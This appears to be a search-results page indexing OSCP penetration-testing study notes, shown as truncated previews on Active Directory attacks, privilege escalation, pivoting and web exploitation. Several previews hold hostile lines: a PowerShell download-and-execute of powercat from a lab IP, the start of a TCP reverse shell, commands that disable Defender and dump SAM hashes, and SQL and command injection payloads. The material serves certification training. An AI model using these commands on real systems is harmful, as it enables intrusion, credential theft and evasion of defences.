Query 228 indexed items — Notion notes, curated guides, and per-port checklists. Filter by OSCP section to narrow results.
Foothold → domain user → domain admin — repeatable path. active directory methodology # AD Attack Chains ## secretsdump with creds → domain hashes ```bash impacket-secretsdump 'DO
The full Active Directory attack checklist — enum, creds, movement, DA. active directory checklist # AD Attack Checklist ## Phase 0: No Credentials - [ ] Null session: `nxc smb DC
Kerberoast, AS-REP roast, ACL abuse, BloodHound queries. active directory kerberos bloodhound # Active Directory ## AD-Enumeration ## Domain Information ```powershell # Get dom
Certificate template misconfigs and how to weaponize them with Certipy. adcs certipy active directory # ADCS Abuse (Active Directory Certificate Services) ## Overview AD Certifica
Notes from oscp.adot8.com — web applications. web applications adot8 # APIs ## Fuzzing APIs ``` /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt ``` ``` ffuf
{% hint style="info" %} linux privilege escalation adot8 # Automated tools {% hint style="info" %} Start off with linPEAS then work your way down {% endhint %} {% embed url="<ht
When it comes to AV evasion we have two primary types available: post exploitation adot8 # AV Evasion ## Overview (Wreath THM) When it comes to AV evasion we have two primary ty
Windows Antimalware Scan Interface (AMSI) allows any program to communicate with the Anti-Virus that communicates on the machine. Essentially a bunch of functions that programs ca…
You might pop a shell on a domain user account that is an Administrator on the local computer but since it's just an interactive shell you can't run anything with the Administrato…
{% embed url="<https://github.com/int0x33/nc.exe/" %} post exploitation adot8 # Compiling Code {% embed url="<https://github.com/int0x33/nc.exe/>" %} We can use **mingw** to com
Notes from oscp.adot8.com — post exploitation. post exploitation adot8 # Disabling Windows Defender ``` Set-MpPreference -DisableRealtimeMonitoring $true -DisableScriptScanning $
{% hint style="info" %} post exploitation adot8 # Executable Obfuscation {% hint style="info" %} This technique was used to bypass AV while exploiting an [Unquoted Service Path](
Notes from oscp.adot8.com — web applications. web applications adot8 # Brute Forcing and Spraying Common Usernames ``` root admin administrator ``` Common Passwords ``` admin
There are many different [C2](https://howto.thec2matrix.com/) frameworks. They can be hosted in the cloud for collaborative red teams post exploitation adot8 # C2 There are many
{% embed url="<https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/" %} linux privilege escalation adot8 # Capabilities {% embed url="<https://www.hackin
Notes from oscp.adot8.com — active directory. active directory adot8 # Checklist ``` ls C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ ``` {% hi
Notes from oscp.adot8.com — linux privilege escalation. linux privilege escalation adot8 # Checklist ``` id ``` ``` find / -group <groups> 2>/dev/null ``` ``` history ``` ```
{% hint style="danger" %} web applications adot8 # Checklist {% hint style="danger" %} Cannot "GET" /blahblah = TRY DIFFRENT REQUEST METHODS {% endhint %} ``` gobuster dir -w /u
{% hint style="info" %} windows privilege escalation adot8 # Checklist {% hint style="info" %} set PATH=%PATH%C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0; {% e
Remove executeables, scripts and added files  post exploitation adot8 # Cleanup ## Overview #### Simply make the system and or network look like it was when you first enter
Notes from oscp.adot8.com — cool. cool adot8 # Client-side Attacks ``` exiftool -a -u quote.pdf ``` {% hint style="info" %} Passive recon viewing metadata of publicly available
Notes from oscp.adot8.com — cool. cool adot8 # Code execution via Windows Library ``` gobuster dir -w ~/opt/wordlists/directories1.txt -u http://192.168.160.199 -x pdf,txt -t 10
Create a new file called pwned.url cool adot8 # Evil Icon Create a new file called **pwned.url** ``` [InternetShortcut] URL=pwned WorkingDirectory=pwned IconFile=\\192.168.45.23
Catch NTLMv2 hashes with badodt cool adot8 # ODT Files Catch NTLMv2 hashes with badodt {% embed url="<https://github.com/rmdavy/badodf/tree/master>" %} Catch a reverse shell in
<pre<code; whoami;asd web applications adot8 # Command injection <pre><code>; whoami;asd & whoami # && whoami ; whoami ; \nwhoami\n \n/bin/whoami\n <strong>\nwhoa
<figure<img src="/files/6Jg4OreFIOeCGgPLUk0q" alt=""<figcaption</figcaption</figure report writing adot8 # Common Legal Documents <figure><img src="/files/6Jg4OreFIOeCGgPLUk0q" a
Notes from oscp.adot8.com — web applications. web applications adot8 # Compiling Exploits ``` i686-w64-mingw32-gcc 42341.c -o exploit.exe ``` ``` i686-w64-mingw32-gcc 42341.c -o
Harvest → crack → reuse — the credential loop across every box. credentials methodology # Credential Extraction Chains ## Mimikatz sekurlsa::logonpasswords ```powershell # Require
[Zerologon](/active-directory/critical-active-directory-cves/zerologon.md) (CVE-2020-1472 ) active directory adot8 # Critical Active Directory CVE's ## Critical Vulnerabilities
The PrintNightmare vulnerability has to do with a flaw found in the Windows Print Spooler service. The flaw being that the service allows users to add printers and devices AND run…
The Zerologon vulnerability allows for attackers to manipulate authentication mechanisms in Microsoft’s Active Directory Netlogon Remote Protocol and compromise the Domain Control…
{% embed url="<https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#cron-jobs" %} linux privilege escalation adot8 # Cron jobs {% emb
Notes from oscp.adot8.com — cool. cool adot8 # Custom Wordlists ## Wordlist rules #### Premade ``` /usr/share/hashcat/rules/rockyou-30000.rule /usr/share/hashcat/rules/InsidePr
{% embed url="<https://www.youtube.com/watch?v=3BQKpPNlTSo" %} windows privilege escalation adot8 # CVE-2019-1388 {% embed url="<https://www.youtube.com/watch?v=3BQKpPNlTSo>" %}
<https://github.com/varwara/CVE-2024-26229 windows privilege escalation adot8 # CVE-2024-26229 (new) <https://github.com/varwara/CVE-2024-26229>
<figure<img src="/files/wrmqIkRfph4Q3J4klGyT" alt=""<figcaption</figcaption</figure cool adot8 # Decrypting Secure Strings <figure><img src="/files/wrmqIkRfph4Q3J4klGyT" alt=""><
1. View users on machine web applications adot8 # Directory Traversal 1. View users on machine 2. Search for SSH Keys 3. Search for passwords in log or configuration files (.htac
Dynamic Link Libraries are like executables but they aren't directly executable. They are shared libraries that contain functions, classes, resources, variables etc and they often…
Notes from oscp.adot8.com — services. services adot8 # DNS \<udp 53> ``` nslookup > server <IP> > <IP> ``` ``` dig axfr adot8.htb @<IP> ``` ``` dig +noall +answer -x 127.0.0.1
Data can be exfiltrated using DNS records and the protocol itself post exploitation adot8 # DNS Tunneling Data can be exfiltrated using DNS records and the protocol itself Creat
{% embed url="<https://gtfobins.github.io/gtfobins/docker/" %} linux privilege escalation adot8 # Docker {% embed url="<https://gtfobins.github.io/gtfobins/docker/>" %} ``` dock
Full host + network enumeration checklist — ports, versions, DNS, SMB, web, misconfigs. checklist recon enumeration # Enumeration Checklist ## Initial Nmap - [ ] `nmap -sC -sV -oN
For backwards compatibility, password hashes present in /etc/passwd will override the ones stored in the shadow file. If we have write access to /etc/passwd we can simply add a ne…
Sometimes there will be services that have executables attached to them. If we have the permissions to manipulate it (FILE\ALL\ACCESS) then we can replace it with a malicious exec…
Dump the SAM hive to the pwd post exploitation adot8 # Exfiltration Dump the SAM hive to the pwd ``` reg.exe save HKLM\SAM C:\programdata\sam.bak ``` Dump the System hive to th
Notes from oscp.adot8.com — post exploitation. post exploitation adot8 # Mimikatz ``` .\mimikatz.exe privilege::debug token::elevate lsadump::sam ```
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.160.147:8888/powercat.ps1');powercat -l -p 6666 -i C:\windows.old\Windows\System32/SAM" post ex
Move files onto and off a target — HTTP, SMB, FTP, base64, certutil. file transfer smb http # File Transfer ## HTTP Servers (Attacker) Start one of these before serving files: `
Notes from oscp.adot8.com — post exploitation. post exploitation adot8 # File Transfers ## Hosting files ```bash python -m SimpleHTTPServer 80 ``` ```bash python -m pyftpdlib -
Notes from oscp.adot8.com — web applications. web applications adot8 # File Upload ``` .pHP .php%00 .asp .pl .phps .php%20 .aspx .cgi .php
A Findings Report entails everything that you did and found on a high and low level. This section will have very quick and short notes on each section of the Findings Report, high…
Notes from oscp.adot8.com — cool. cool adot8 # Fixing Exploits #### Buffer Overflows ``` msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.157 LPORT=1337 EXITFUNC=thread -f
Notes from oscp.adot8.com — web applications. web applications adot8 # Foothold ``` $client = New-Object System.Net.Sockets.TCPClient("192.168.45.237",1337);$stream = $client.Get
Notes from oscp.adot8.com — services. services adot8 # FTP \<tcp 21> ``` wget -r ftp://anonymous:anonymous@10.10.10.184/ ``` ``` ftp-ssl -z secure -z verify=0 -p $ip ``` ``` ft
Notes from oscp.adot8.com — windows privilege escalation. windows privilege escalation adot8 # getsystem ``` getsystem ``` For a more stable shell migrate to a 64bit process run
- [Disk](https://oscp.adot8.com/linux-privilege-escalation/groups/disk.md) linux privilege escalation adot8 # Groups - [Disk](https://oscp.adot8.com/linux-privilege-escalation/gr
Notes from oscp.adot8.com — linux privilege escalation. linux privilege escalation adot8 # Disk ``` id ``` <figure><img src="/files/niny9GDkomXcDn78pIap" alt=""><figcaption></fi
Notes from oscp.adot8.com — linux privilege escalation. linux privilege escalation adot8 # LXD/LXC
There may be a mlocate.db file with past mlocate command queries. May come in handy looking for sensitive files linux privilege escalation adot8 # mlocate There may be a **mlocat
{% embed url="<https://book.hacktricks.xyz/network-services-pentesting/113-pentesting-ident" %} services adot8 # IDENT \<tcp 113> {% embed url="<https://book.hacktricks.xyz/netwo
Notes from oscp.adot8.com — services. services adot8 # IMAP \<tcp 143> ``` telnet postfish.off 143 ``` ``` A1 LOGIN sales sales A1 LIST "" * A1 SELECT INBOX A1 FETCH 1 all A1 FE
<figure<img src="/files/r4SUdQmiNd7LrF1XI4VA" alt=""<figcaption<pHTB Machine Jeeves</p</figcaption</figure windows privilege escalation adot8 # Impersonation and Potato Attacks #
Notes from oscp.adot8.com — services. services adot8 # Inital Scans ``` nmap -p- --min-rate=1000 -Pn -v $ip ``` ``` nmap -sC -sV -T5 -Pn -p $open_ports $ip ``` <pre><code>nmap
From open ports to a shell — the decisions that turn recon into foothold. initial access foothold checklist # Initial Access Checklist ## Web Application Attacks - [ ] Default cre
Start off with[ Responder ](/active-directory/initial-attack-strategy/llmnr-poisoning.md)and [mitm6](/active-directory/initial-attack-strategy/ipv6-attacks.md) at times where user…
Find users using [Kerbrute](/active-directory/initial-attack-strategy/kerbrute.md) first then use that username to see if they need pre auth for a TGT active directory adot8 # AS-
Typically machines on networks run on IPv4, sometimes not even utilizing IPv6 at all but still have it enabled by default. In a network there is usually nobody doing DNS for IPv6 a
Bruteforcing domain usernames is possible with Kerbrute. This is valuable from an information gathering perspective and can lead to some quick wins. active directory adot8 # Kerbr
Link Local Multicast Name Resolution (LLMNR), is used to identify hosts when DNS fails to do so in the network. active directory adot8 # LLMNR Poisoning ## Overview Link Local M
Pull a lot of information out of the Domain Controller using enum4linux active directory adot8 # Misc ## Enum4linux Pull a lot of information out of the Domain Controller using
{% embed url="<https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack" %} active directory adot8 # Passback Attack {% embed url="<https://www.mindpointgroup.c
Notes from oscp.adot8.com — active directory. active directory adot8 # RPC ``` rpcclient -U '' -N 10.10.10.169 ``` ``` enumdomusers enumdomgroups ``` {% hint style="info" %}
If we're able to dump the SAM in the SMB Relay attack then we can use those hashes to pop a shell on a machine.  active directory adot8 # Shell Acess ## Gaining Shell Access
Instead of cracking the captured hashes, we can instead relay those hashes to specific machines and potentially gain access. active directory adot8 # SMB Relay ## Overview Inste
{% embed url="<https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/" %} linux privilege escalation adot8 # Initial Enumeration ## Playbook * System Enumeration * U
Feed [Windows Exploit Suggester ](/windows-privilege-escalation/kernel-exploits.md)the [system information](/windows-privilege-escalation/initial-enumeration-manual/system-enumera…
Look for quick wins with Kernel Exploits using Windows Exploit Suggester or the Metasploit Local Exploit Suggester.  windows privilege escalation adot8 # Methodology > Tools
Basic [System enumeration](/windows-privilege-escalation/initial-enumeration-manual/system-enumeration.md) windows privilege escalation adot8 # Initial Enumeration Manual ## Play
Notes from oscp.adot8.com — windows privilege escalation. windows privilege escalation adot8 # AV and Firewall Enumeration ## View Running Services ``` sc queryex type= service
Notes from oscp.adot8.com — windows privilege escalation. windows privilege escalation adot8 # Network Enumeration ## Gather Host Networking Information ```powerquery ipconfig /
Notes from oscp.adot8.com — windows privilege escalation. windows privilege escalation adot8 # Password Hunting ## Passwords in the Registry ```powerquery reg query "HKLM\SOFTWA
Notes from oscp.adot8.com — windows privilege escalation. windows privilege escalation adot8 # System Enumeration ## Gather Basic System Information ```powerquery systeminfo ```
Notes from oscp.adot8.com — windows privilege escalation. windows privilege escalation adot8 # User Enumeration ## Gather Current User Informtion  ```powerquery whoami /all
{% hint style="info" %} linux privilege escalation adot8 # Network Enumeration {% hint style="info" %} Checking the interfaces and directly connected networks is important to kno
Notes from oscp.adot8.com — linux privilege escalation. linux privilege escalation adot8 # Password Hunting ## Password in files or as a filename ``` grep --color=auto -rnw '/'
<pre<code<stronguname -a linux privilege escalation adot8 # System Enumeration ## Get kernel version <pre><code><strong>uname -a </strong></code></pre> ``` cat /proc/version ca
Notes from oscp.adot8.com — linux privilege escalation. linux privilege escalation adot8 # User Enumeration ## Who are you? ``` whoami id ``` ## View sudo permissions ``` sudo
Unconstrained, constrained, and RBCD delegation — theory + abuse. kerberos delegation active directory # Kerberos Delegation ## Overview Delegation allows a service to act on beha
The Kernel is essentially a computer program that controls everything in the system. It facilitates the interactions between hardware and software components. If we exploit the Ke…
The Kernel is essentially a computer program that controls everything in the system. It facilitates the interactions between hardware and software components. If we exploit the Ke…
- [DCOM](https://oscp.adot8.com/active-directory/lateral-movement/dcom.md) active directory adot8 # Lateral Movement - [DCOM](https://oscp.adot8.com/active-directory/lateral-move
The user must be a local admin active directory adot8 # DCOM The user must be a local admin Set the dcom variable instantiating a remote MMC 2.0 application on the target `$dco
User credentials of a local admin on the remote target is needed to create new processes active directory adot8 # LOTL WMI and WinRM User credentials of a local admin on the remo
Create Kerberos tickets using a users NTLM hash and mimikatz active directory adot8 # Overpass the Hash Create Kerberos tickets using a users NTLM hash and mimikatz ### Local O
With a cracked a password and or dumped SAM hashes, we can use both of them for lateral movement by passing them around machines in the network. active directory adot8 # Pass the
Export all tickets on the machine using mimikatz active directory adot8 # Pass the Ticket Export all tickets on the machine using mimikatz ``` privilege::debug sekurlsa::tickets
Notes from oscp.adot8.com — services. services adot8 # LDAP \<tcp 389, 636> Dumping domain info ``` ldapdomaindump ldap://dc.sequel.htb -u 'sequel.htb\user' -p 'pwd' ``` ``` ld
Directory traversal is used to read the contents of a file outside of the web server’s web root. File inclusion vulnerabilities allow us to include a file in the application’s run…
Notes from oscp.adot8.com — web applications. web applications adot8 # PHP Wrappers ``` php://filter/resource=/etc/passwd php://filter/resource=index.php php://filter/convert.bas
Ordered decision tree for Linux privilege escalation. linux privesc methodology # Linux Privesc Chains ## SUID find/vim/python/nmap → root ```bash find / -perm -4000 -type f 2>/de
SUID, sudo, capabilities, cron, kernel — LinPEAS-driven Linux PE. linux privesc linpeas # Linux Privilege Escalation ## Linux-Enum ## System Information ```bash # OS and kernel
- [Wild Cards](https://oscp.adot8.com/linux-privilege-escalation/misc/wild-cards.md) linux privilege escalation adot8 # Misc - [Wild Cards](https://oscp.adot8.com/linux-privilege
- [PWNCAT](https://oscp.adot8.com/services/misc/pwncat.md) services adot8 # Misc - [PWNCAT](https://oscp.adot8.com/services/misc/pwncat.md) - [WordPress](https://oscp.adot8.com/s
<figure<img src="/files/Hp8WEnsYaKbHRw2IPOFd" alt=""<figcaption</figcaption</figure web applications adot8 # Misc ## Adding Headers Before: <figure><img src="/files/Hp8WEnsYaKb
<figure<img src="/files/MlFOPBHjqnIYrLVDnkNf" alt=""<figcaption</figcaption</figure linux privilege escalation adot8 # Abusing scripts ## Command Injection w/ Scripts <figure><i
If the user www is apart of the wheel group, you can start the apache2 service, plant a reverse shell and become www linux privilege escalation adot8 # FreeBSD If the user **www*
Notes from oscp.adot8.com — services. services adot8 # Git Located at ``` http://gitea.site.htb http://site.htb/.git http://site.htb/dev/.git ``` Pull source code from .git dir
Notes from oscp.adot8.com — services. services adot8 # Keepass ``` keepass2john passcodes.kdbx > passcodes.hash ``` ``` kpcli open passcodes.kdbx cd Network show 0 ``` {% embed
This script is only readable by everyone. Its not running in cron that we can see but we can use pspy to see if it really is. linux privilege escalation adot8 # Library Hijacking
{% embed url="<https://app.gitbook.com/o/4cuxnrxcO9zV8MithZcs/s/SBzxWZ0EMDOdQIjKvSn2/warm-up/solstice/priv-esc-1" %} linux privilege escalation adot8 # PHP Web Applications {% em
Notes from oscp.adot8.com — services. services adot8 # PWNCAT ``` pwncat-cs -m windows -lp 1337 ```
Notes from oscp.adot8.com — linux privilege escalation. linux privilege escalation adot8 # Restricted shell escaping Vim ``` :!/bin/bash :set shell=/bin/bash :shell ``` Rbash
Notes from oscp.adot8.com — services. services adot8 # Site Scraping ``` cewl http://10.10.110.100/wordpress/ > scraped_dantellc.txt ```
<figure<img src="/files/PgK5NysG5jKm5CI0S3iZ" alt=""<figcaption</figcaption</figure linux privilege escalation adot8 # Wild Cards <figure><img src="/files/PgK5NysG5jKm5CI0S3iZ" a
Notes from oscp.adot8.com — services. services adot8 # WordPress ``` wpscan --url $url wpscan --url $url -e vp <- Vulnerable plugins wpscan --url $url -e cb <- Config ba
Notes from oscp.adot8.com — services. services adot8 # MSSQL \<tcp 1433> ``` netexec mssql 10.10.10.101 -d domain -u adot8 -p password -x "whoami" ``` <pre><code><strong>mssqlcl
xp_cmdshell, impersonation, linked servers, and OS command execution via MSSQL. mssql port 1433 database # MSSQL Attacks ## Connecting ```bash # With Windows auth: impacket-mssqlc
<figure<img src="/files/EDxCVdAwptwTjFqHraMX" alt=""<figcaption</figcaption</figure services adot8 # MySQL\<tcp 3306> <figure><img src="/files/EDxCVdAwptwTjFqHraMX" alt=""><figca
Per-service commands for FTP (21), SSH (22), SMTP (25), DNS (53), SMB (139/445), SNMP (161), LDAP (389), MSSQL (1433), RDP (3389) and more. services ports cheatsheet # Network Serv
Notes from oscp.adot8.com — linux privilege escalation. linux privilege escalation adot8 # NFS Root Squashing ```bash cat /etc/exports ``` If we see **no\_root\_squash,** this m
Having sudo access to /usr/sbin/nginx we can web server as root as access the filesystem (read and write) using root privileges. linux privilege escalation adot8 # Nginx Having s
{% hint style="info" %} web applications adot8 # Node.js {% hint style="info" %} If directory enumeration isn't working with gobuster and it is a node.js application, directories
Hashcat / John modes, spraying, brute force, wordlists, and credential reuse. hashcat john brute force # Password Attacks ## Hash-Cracking ## Identify Hash Type ```bash hashid
- [Passwords](https://oscp.adot8.com/linux-privilege-escalation/passwords-and-file-permissions/passwords.md) linux privilege escalation adot8 # Passwords & File Permissions - [Pa
Notes from oscp.adot8.com — linux privilege escalation. linux privilege escalation adot8 # Passwords ### Check the history first ``` history cat .bash_history ``` ### Check for
{% embed url="<https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#last-edited-files" %} linux privilege escalation adot8 # SSH Keys
<figure<img src="/files/Hmj9bDr6OJqJ06DIcv9Y" alt=""<figcaption</figcaption</figure linux privilege escalation adot8 # Weak File Permissions <figure><img src="/files/Hmj9bDr6OJqJ
<figure<img src="/files/Ip9KereDEo8o4rjJI2rm" alt=""<figcaption</figcaption</figure linux privilege escalation adot8 # Path Variables <figure><img src="/files/Ip9KereDEo8o4rjJI2r
{% embed url="<https://raw.githubusercontent.com/ivan-sincek/php-reverse-shell/master/src/reverse/phpreverseshell.php" %} web applications adot8 # Payloads {% embed url="<https:/
The end-to-end mental model — how to approach any engagement. methodology process # Pentest Methodology ## Phase 1: Reconnaissance & Enumeration ``` nmap -sC -sV -oN nmap/initial
Notes from oscp.adot8.com — post exploitation. post exploitation adot8 # Persistence ## Windows Persistence ### Metasploit persistence script ```bash exploit/windows/local/regi
{% embed url="<https://www.openwall.com/lists/john-users/2015/11/17/1" %} post exploitation adot8 # PGP/ASC {% embed url="<https://www.openwall.com/lists/john-users/2015/11/17/1>
Fuzz php? parameters web applications adot8 # PHP Applications Fuzz php? parameters ``` ffuf -k -u https://streamio.htb/admin/index.php?FUZZ=id -w burp-parameter-names.txt ```
You compromise a machine and see that it has another interface on it that's connected to a different network.  post exploitation adot8 # Pivoting ## Overview ### Scenario
Chisel, ligolo-ng, proxychains, SSH tunnels, port forwarding. pivot chisel ligolo # Pivoting & Tunneling ## SSH-Tunneling ## Local Port Forwarding ```bash # Forward local port
When and how to pivot into an internal network. pivot methodology # Pivoting Chains ## Ligolo-ng Setup ```bash # On attacker (proxy): sudo ip tuntap add user $(whoami) mode tun li
Chisel works in a client server way so the chisel binary needs to be on both the attacking machine and the compromised server. post exploitation adot8 # Chisel **Chisel** works i
{% hint style="info" %} post exploitation adot8 # Double Pivot {% hint style="info" %} Shoutout [Rapunzel3000](https://forum.hackthebox.com/u/Rapunzel3000) for this one {% endhi
1. Enumerate material found on the machine.  post exploitation adot8 # Eumeration 1. Enumerate material found on the machine.  2. Use pre-installed tools on the machine
- [Tunneling](https://oscp.adot8.com/post-exploitation/pivoting/good-to-know/tunneling.md) post exploitation adot8 # Good to Know - [Tunneling](https://oscp.adot8.com/post-exploi
Notes from oscp.adot8.com — post exploitation. post exploitation adot8 # Metasploit #### Get chisel, proxy chains setup, launch metasploit and obtain a meterpreter session ``` p
Pink.exe explained [here](/windows-privilege-escalation/stored-passwords-and-port-forwarding.md#port-forwarding) post exploitation adot8 # Plink.exe ## Overview Pink.exe explain
Notes from oscp.adot8.com — post exploitation. post exploitation adot8 # Port Forwarding via \~C ``` ssh dev@192.168.176.150 -i dev -o EnableEscapeCommandline=yes ``` ``` daniel
Socat can be used create port forwards and relays. post exploitation adot8 # Socat ## Overview **Socat** can be used create port forwards and relays. For example if you are att
Comment the proxy\dns line in the /etc/proxychains4.conf file post exploitation adot8 # Tunneling ## Proxychains Comment the **proxy\_dns** line in the **/etc/proxychains4.conf*
SSHuttle creates a tunneled proxy that acts like a new interface, simulating a VPN, allowing us to route our traffic through the proxy without the use of[ proxychains](/post-explo…
Notes from oscp.adot8.com — services. services adot8 # POP3 \<tcp 110> ``` adot@kali:~/oscp/htb/linux/solidstate$ telnet 10.10.10.51 110 Trying 10.10.10.51... Connected to 10.10.
Config file can be found at services adot8 # Port Knocking Config file can be found at ``` /etc/knockd.conf ``` <figure><img src="/files/JKKWnjToRXXydOGZhTrc" alt=""><figcaptio
Start off with quick wins such as [Kerberoasting](/active-directory/post-compromise-attacks/kerberoasting.md),[ ](/active-directory/post-compromise-attacks/dumping-and-cracking-ha…
{% embed url="<https://www.blackhillsinfosec.com/abusing-active-directory-certificate-services-part-one/" %} active directory adot8 # AD CS Attacks {% embed url="<https://www.bla
After compromising a Local Administrator account, we can dump hashes from he SAM and LSA on the machine using secretsdump. This can be done using the accounts password or hash. act
Group policy preferences (GPP) allowed Administrators to create policies using embedded credentials. These credentials were encrypted and placed in a "cPassword". The encryption k…
This attack takes advantage of service accounts that use Kerberos authentication.  active directory adot8 # Kerberoasting ## Overview This attack takes advantage of service
{% embed url="<https://www.thehacker.recipes/a-d/movement/kerberos/forged-tickets/ms14-068" %} active directory adot8 # Knock and Pass Kerberos {% embed url="<https://www.thehack
A LNK File Attack is a type of [watering hole attack](https://www.techtarget.com/searchsecurity/definition/watering-hole-attack) that is done by creating a malicious file that poi…
Mimikatz can be used to dump credentials in memory and make Kerberos tickets. Although it will get stopped by any and all Anti-Virus out there. Heavily obfuscating the executable …
Notes from oscp.adot8.com — active directory. active directory adot8 # misc ## smbclient ``` smbclient "\\\\10.10.10.6\Accounting" -U john%Password1 ``` ``` -t 120 --socket-op
Notes from oscp.adot8.com — active directory. active directory adot8 # noPac or noCap ? ``` > whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name
{% hint style="info" %} active directory adot8 # RPC Password Change {% hint style="info" %} If your compromised user is ever apart of a "Support" "IT" or "Admin" group, try rese
{% hint style="info" %} active directory adot8 # Silver Ticket {% hint style="info" %} The username and password of the service account is needed for this attack {% endhint %} C
Tokens are temporary keys that allow you access to a system/network without having to provide credentials each time you access a file active directory adot8 # Token Impersonation
Notes from oscp.adot8.com — active directory. active directory adot8 # Post-Compromise Enumeration ## Checklist ``` net user /domain ``` ``` net group /domain ``` ``` Get-ADDo
Bloodhound works the same way that [ldapdomaindump ](/active-directory/post-compromise-enumeration/ldapdomaindump.md)but it also collects data using Kerberos tickets and SMB sessi…
<figure<img src="/files/c5N9LvI7TNu1nv1crbxK" alt=""<figcaption</figcaption</figure active directory adot8 # Attack Paths ### GenericAll <figure><img src="/files/c5N9LvI7TNu1nv1
Ldapdomaindump works by connecting to the LDAP server/Domain Controller, and querying it for information about users, groups, etc. It takes the responses from the server and puts…
Notes from oscp.adot8.com — active directory. active directory adot8 # ldapsearch ``` ldapsearch -H ldap://domain.htb -D 'user@domain.htb' -w 'pwd' -b 'dc=support,dc=htb' ``` Se
Plumhound does the same thing that [Bloodhound](/active-directory/post-compromise-enumeration/bloodhound.md) does, however it can provide us with a different way and even more sui…
Take a different approach active directory adot8 # Post-Domain Compromise ## Playbook * Do it again * Take a different approach * Find more vulnerabilities * Provide more
NTDS.dit is the core database file of Active Directory, storing user accounts, groups, and their attributes on the Domain Controllers active directory adot8 # Dumping the NTDS.dit
When we compromise the krbtgt account, we will own the domain and be able to grant tickets however we want to. This allows us complete access to every machine in the domain. active
Bash one-liner to just output NTLM Hashes active directory adot8 # SAM Cleanup Bash one-liner to just output NTLM Hashes ```bash cat hashes.txt | grep ::: | awk -F: '{print $1":
Use the MS signed vshadow tool to take a snapshot of the Domain Controller active directory adot8 # Shadow Copies Use the MS signed vshadow tool to take a snapshot of the Domain
Loot, persistence, and next-host pivoting after you land root/SYSTEM. post-ex checklist # Post-Exploitation Checklist ## Stabilize Shell - [ ] Upgrade to full TTY (Linux): ```ba
PostgreSQL is an open-source object-relational database. Default port 5432/tcp (falls back to 5433 if in use). Source: [HackTricks — Pentesting PostgreSQL](https://hacktricks.wiki…
Cross-platform privilege escalation checklist. privesc checklist # Privilege Escalation Checklist ## Windows Privesc ### Quick Wins - [ ] `whoami /priv` → SeImpersonate? SeBackup
Notes from oscp.adot8.com — post exploitation. post exploitation adot8 # Putty ``` puttygen root.ppk -O private-openssh -o root_rsa ```
Notes from oscp.adot8.com — cool. cool adot8 # Random ``` ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" learner@192.168.50.52 ```
[Autoruns](/windows-privilege-escalation/registy/autoruns.md) windows privilege escalation adot8 # Registy ## Content * [Autoruns](/windows-privilege-escalation/registy/autoruns
AlwaysInstallElevated is a misconfiguration that installs all msi packages as system. Wheels spinning? windows privilege escalation adot8 # AlwaysInstallElevated ## Overview **A
AutoRun is a feature that will automatically runs a program or application when a drive is mounted. This can be exploited by changing the executable of an existing Autorun program…
After enumeration, if it's discovered that we have full permissions to a registry key, we can compile a malicious executable written in C and get it to run a command for us as sys…
The RunAs command can be thought of as the sudo command in Linux. It allows you to run a command as someone else, aka the Administrator windows privilege escalation adot8 # RunAs
Notes from oscp.adot8.com — windows privilege escalation. windows privilege escalation adot8 # Scheduled tasks ``` schtasks /query /fo LIST /v ``` Check permissions on binary `
Why SeImpersonatePrivilege matters and how the Potato family abuses it. seimpersonate potato windows ## SeImpersonatePrivilege Exploitation ### Check for Privilege ```powershell w
Escalation via [Binary Paths](/windows-privilege-escalation/service-permissions/binary-paths.md) windows privilege escalation adot8 # Service Permissions ## Exploitation options
Services sometimes have executables attached to them. If we have the right permissions to the service then we can change the binary path (executable file) to a malicious one. windo
Unquotes service paths is similar to[ binary path exploitation](/windows-privilege-escalation/service-permissions/binary-paths.md), however the vulnerability lays in the fact that…
Reverse/bind shell one-liners, msfvenom payloads, TTY upgrades. reverse shell payload msfvenom # Shells & Payloads ## Listeners ```bash nc -nlvp 443 pwncat-cs -lp 443 # Metasplo
Notes from oscp.adot8.com — services. services adot8 # SMB \<tcp 445, 139> ``` netexec smb <IP> -u '' -p '' --shares ``` ``` enum4linux <IP> ``` ``` smbmap -H <IP> ``` ``` smb
Connect, enumerate users (VRFY/EXPN/RCPT), open-relay testing, spoofing, injection, brute-force, and post-exploitation on port 25/465/587. smtp port 25 465 587 enumeration phishing
Notes from oscp.adot8.com — services. services adot8 # SMTP \<tcp 25> ``` nmap -p25 --script=smtp* 192.168.160.136 -v ``` ``` telnet 192.168.160.136 25 VRFY root EXPN root ```
{% hint style="danger" %} services adot8 # SNMP \<udp 161> {% hint style="danger" %} IF SNMP IS OPEN, COMB THROUGH IT THOROUGHLY {% endhint %} ``` snmp-check 192.168.235.156 -c
<figure<img src="/files/7I5gAlxQJnFBMXWN2TRT" alt=""<figcaption</figcaption</figure web applications adot8 # Source Code ## LFI UpDown HTB <figure><img src="/files/7I5gAlxQJnFB
<strong' order by 1 -- - web applications adot8 # SQL Injection ## Manual <pre><code>' or 1=1 ' or 1=1-- - ' or 1=1# ' or 1=1/ ' or 1=1-- - // <strong>' order by 1 -- - </stron
<strongunion select name,id from <db..sysobjects where xtype='u'-- - web applications adot8 # MSSQL Cheatsheet #### Database names and ID's <pre><code>user db_name(5) <stro
Notes from oscp.adot8.com — web applications. web applications adot8 # MySQL Cheatsheet ``` SELECT database() SELECT schema_name FROM information_schema.schemata SELECT schema_na
{% embed url="<https://wpscan.com/vulnerability/c1620905-7c31-4e62-80f5-1d9635be11ad/" %} web applications adot8 # Page {% embed url="<https://wpscan.com/vulnerability/c1620905-7
Notes from oscp.adot8.com — web applications. web applications adot8 # Payloads ``` or 1=1 or 1=1-- - or 1=1-- - // or 1=1# or 1=1/ ' or 1=1 ' or 1=1-- - ' or 1=
Notes from oscp.adot8.com — web applications. web applications adot8 # Postgres Cheatsheet ``` 'select pg_sleep(3) ;select pg_sleep(3) ``` {% embed url="<https://pentestmonkey.n
